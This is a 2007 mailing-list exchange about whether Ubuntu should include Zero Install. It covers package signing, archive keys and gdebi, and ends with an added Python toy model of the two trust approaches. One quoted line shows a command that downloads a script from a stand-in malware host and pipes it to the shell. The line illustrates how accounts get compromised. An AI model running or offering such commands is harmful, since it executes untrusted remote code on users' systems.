On Wed, 10 Jan 2007 15:21:45 +0100, Reinhard Tartler wrote:
> "Thomas Leonard" <[EMAIL PROTECTED]> writes:
[...]
>> - Type:
>> $ wget malware.com/malware -O -|sh
>> Result: User account compromised.
[...]
> Red Carpet? Yes, I've seen something like that.
That wasn't the one I was thinking of, but I imagine there are plenty of
people doing the same thing.
> Still, I wouldn't
> recommend running arbitrary 3rd party shell scripts as root (or as any
> user) on users machines. Perhaps in qemu for testing or something ;)
So Ubuntu isn't against the idea of users being able to run any software,
just the idea of them running programs with limited security protection?
(run-in-VM OK, run-as-user not OK, yes?)
So full virtualisation is one option there, but it's massively inefficient
to install every program and its dependencies in a different VM (think how
many copies of GTK you'd need ;-)
Zero Install's goal is to make installation 'safe' (installing
arbitrary or malicious packages won't harm your system). Running them is
another matter, and that's where a good sandbox comes in (e.g. plash, etc).
It's really difficult to do this kind of thing with APT, because it
installs files to shared directories ('bin', etc) and runs scripts inside
the packages ('preinst', etc). How could you write a security policy for
APT that let you install software without risking the system? Zero Install
lets you do this.
In other words, Zero Install isn't a complete security system, but it's a
necessary part of a solution.
>>> Where do these 'known' keys come from? Who authorizes these keys?
>>
>> Currently, people post them to a public mailing list and I add them.
>> Here's a screenshot showing a typical dialog:
>>
>> http://0install.net/trustbox.png
>>
>> If universe has stricter checks, we could use that keyring too for the
>> hints ("This key is approved by MOTU" / "MOTU has not approved this key -
>> USE AT OWN RISK!").
>
> There is only ONE archive key. Only authorized developers can upload to
> our archive.
I think Debian has the same system. Essentially, an attacker can either
compromise the archive key OR any developer's key (since the archive
key will sign any upload from a developer).
I guess it also means that all users have to trust all developers, even
those whose software they don't use?
I was thinking more about the keyring that decides who can upload. If
someone is authorised to upload packages to Ubuntu, then I'd feel a lot
happier about using their programs.
> As for 3rd party repositories, we don't have adequate
> support for verifying gpg keys. (something which I think could need
> improvement, but anyway).
Of course, this is always the most difficult area of security, and who
wants to do the verification work? Still, knowing that someone has been
signing software for years with a certain key without any reports of bad
behaviour is a start.
> This is a bit different to 0install, where it
> seems that random upstream/malware authors sign their software, and the
> user has to accept that key like you show in the screenshot. The dialog
> however doesn't offer any support for validation of the key. Do you
> perhaps require these keys are signed by an 'authorization key'? or
> offer some path finding tool to find 'trust paths'? You see, validating
> keys is a quite difficult problem. One reason why there is only one
> archive key in ubuntu.
Having one master key that blindly signs anything sent to it by
an authorised person doesn't seem to solve the problem. How do you
decide which keys are trusted by the program with the master key?
Ultimately, we both have a list of developer keys we trust to some extent
(you trust all of them fully on behalf of your users, we just note that
we've seen them before on a public list). As I say, I'm happy to believe
that Ubuntu performs better checks than I do, and I'd be happy to use your
list. But you must have a list, somewhere.
>> Do Ubuntu users really need to be "authorised" by you to run software
>> on their own computers?
>
> No, we don't require this. However, we promise support for all software
> which is signed by us. If we would include 0install, we would promise to
> support the 0install installer.
>
> My concern here is now that users could understand the inclusion of the
> 0install installer would mean that all software which is installable by
> 0install is supported as well. Something we cannot sensibly do.
Actually, users already think Ubuntu promises to support Zero Install.
(Proof: Download the zeroinstall .deb and open it. Ubuntu offers to install
it using gdebi, a supported tool supplied with Ubuntu.)
In fact, gdebi happily tells the user that the program is written by
"Thomas Leonard", without any proof of this at all! There is no warning
about installing 3rd-party software or unknown keys.
So, I'm trying to understand what Ubuntu's policy is.
- Is it acceptable to let the user install any software package they
find with minimal or no warning from anywhere on the web?
If not, will gdebi be removed from the distribution? If so, how can this
be used as an argument against Zero Install?
>>> I fear that we'll get bugreports from 3rd party software by users, who
>>> have installed random software via 0install, and that we will not be
>>> able to support them.
>>
>> That's true. How do you deal with this problem with Firefox extensions,
>> Python distutil modules, modified sources.list files and similar?
>
> Good point. Partly we do get bugreports about them (mostly misfiled),
> but in most cases, we have to answer users that we cannot support
> them. I don't want to repeat this misery with 0install.
Compilation failures offer to send the bug report back to us already, but
currently we don't trap runtime bugs. Perhaps there's some hint we can
provide for bug-buddy to let it know where to send things (though I realise
that handling crashes doesn't cover all cases).
> I think that if you find a developer, who promises to care for 0install,
> and the ftp-masters of ubuntu don't object, we could include
> 0install. But as you already have read in other posts, there are some
> anti-sentiments against automatix, autopackage and similar projects among
> ubuntu developers. 0install seems in many ways quite similar to them and
> seems to have similar problems.
OK, but I'd like to have a discussion about it first if other developers
are unhappy. I'd like to think that Zero Install is at least as secure as
your existing gdebi, and hopefully somewhat better, so if I've missed
something please let me know.
--
Dr Thomas Leonard http://rox.sourceforge.net
GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1
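As an added illustration of the argument above (not code from the thread or from Zero Install or Ubuntu), here is a toy model of the two trust policies: one archive key that re-signs any upload from an authorised developer, versus per-feed keys the user has seen before. All key names, developers, feeds and install sets are constructed for the example; `compare()` returns, for a given user's installed set, which key compromises could deliver them a malicious update under each model.

```python
# Added example, not from the thread: a toy model of the two trust models
# discussed above. All keys, feeds and install sets are constructed.

ARCHIVE_KEY = "ARCHIVE-KEY"
DEVELOPER_KEYS = {"alice-key", "bob-key", "carol-key"}   # allowed to upload

def archive_accepts(signature_key, uploader_key):
    """Archive model: the archive key signs any upload from an authorised
    developer, so the end user only ever checks the single archive key."""
    return signature_key == ARCHIVE_KEY and uploader_key in DEVELOPER_KEYS

def archive_exposure(installed):
    """Keys whose compromise could deliver a malicious update to this user.
    Any developer may upload any package, so the set does not depend on
    what the user actually has installed."""
    return {ARCHIVE_KEY} | DEVELOPER_KEYS

def zeroinstall_accepts(signature_key, trusted_keys):
    """Zero Install model as described above: a feed is accepted silently
    only if its signing key is already in the user's own trusted list;
    otherwise a dialog asks the user."""
    return signature_key in trusted_keys

def zeroinstall_hint(signature_key, approved_keys):
    """Hint text the dialog could show from an external keyring (e.g. MOTU).
    The hint informs the user's decision; it does not make it."""
    if signature_key in approved_keys:
        return "This key is approved by MOTU"
    return "MOTU has not approved this key - USE AT OWN RISK!"

def zeroinstall_exposure(installed, feed_keys):
    """Keys whose compromise matters to this user: only those signing the
    feeds the user actually runs."""
    return {feed_keys[feed] for feed in installed}

# Constructed mapping of feed name -> key that signs that feed.
FEED_KEYS = {"editor": "alice-key", "game": "bob-key", "mailer": "carol-key"}

def compare(installed):
    """(archive-model exposure, zero-install exposure) for one install set."""
    return archive_exposure(installed), zeroinstall_exposure(installed, FEED_KEYS)
```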